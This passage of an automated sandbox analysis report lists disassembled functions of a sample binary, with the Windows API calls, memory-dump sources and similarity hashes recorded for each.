                                                Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID: \VH
                                                • API String ID: 1682464887-234962358
                                                • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: \VH
                                                • API String ID: 2507767853-234962358
                                                • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                • String ID: crts
                                                • API String ID: 943502515-3724388283
                                                • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorMode$LabelVolume
                                                • String ID: \VH
                                                • API String ID: 2006950084-234962358
                                                • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetMenuItemInfoW.USER32 ref: 00449727
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                • DrawMenuBar.USER32 ref: 00449761
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw_malloc
                                                • String ID: 0
                                                • API String ID: 772068139-4108050209
                                                • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcscpy
                                                • String ID: 3, 3, 8, 1
                                                • API String ID: 3469035223-357260408
                                                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCloseHandle
                                                • API String ID: 2574300362-3530519716
                                                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpCreateFile
                                                • API String ID: 2574300362-275556492
                                                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                • API String ID: 2574300362-58917771
                                                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                • VariantClear.OLEAUT32(?), ref: 00479650
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                • __itow.LIBCMT ref: 004699CD
                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                • __itow.LIBCMT ref: 00469A97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow
                                                • String ID:
                                                • API String ID: 3379773720-0
                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                Download Yara Rule
                                                APIs
